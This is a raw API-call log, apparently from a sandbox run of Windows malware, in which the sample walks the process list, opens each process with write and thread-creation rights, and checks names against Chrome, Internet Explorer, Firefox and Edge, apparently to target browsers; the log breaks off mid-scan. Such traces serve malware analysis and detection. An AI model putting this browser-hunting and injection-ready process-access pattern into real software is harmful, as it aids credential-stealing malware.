	[0222.826] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0222.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5510
	[0222.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.827] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0222.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.828] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.828] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0222.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.829] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.829] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0222.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5514
	[0222.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.830] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0222.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.830] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.830] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0222.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.831] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0222.832] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5518
	[0222.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.832] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.833] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.833] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.833] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.833] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x551c
	[0222.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.834] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.835] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.835] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.835] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.836] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5520
	[0222.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.836] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.837] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.837] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.837] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.838] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5524
	[0222.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.839] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.839] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.839] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.840] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.840] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5528
	[0222.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.841] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.841] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.841] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.842] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.842] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x552c
	[0222.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.843] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.843] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.843] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.844] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.844] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5530
	[0222.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.845] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.845] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.845] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.846] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.846] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5534
	[0222.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.848] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.848] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.848] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.849] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0222.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5538
	[0222.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.850] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0222.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.850] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.851] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0222.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.851] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.851] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x553c
	[0222.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.852] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.852] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.853] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.853] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.853] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0222.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5540
	[0222.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.854] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.855] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.855] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.855] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.855] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5544
	[0222.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.856] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.857] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.857] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.857] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.857] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.858] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5548
	[0222.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.858] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.859] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.859] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.859] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.860] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x554c
	[0222.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.860] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.861] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.861] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.861] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0222.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5550
	[0222.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.863] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0222.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.864] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.864] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0222.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.864] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.864] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0222.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5554
	[0222.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.865] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.865] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.866] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.866] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0222.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5558
	[0222.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.867] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0222.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.867] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.868] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0222.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.868] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0222.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0222.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0222.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x555c
	[0222.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.870] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0222.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.871] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.872] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0222.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.872] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.873] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0222.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5560
	[0222.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.874] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0222.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.874] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.874] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0222.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.875] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0222.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5564
	[0222.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.876] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0222.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.876] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.876] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0222.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.877] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.877] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0222.878] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5568
	[0222.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.879] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0222.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.879] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.879] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0222.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.880] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0222.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x556c
	[0222.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.881] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0222.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.881] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.882] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0222.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.883] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.883] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0222.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5570
	[0222.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
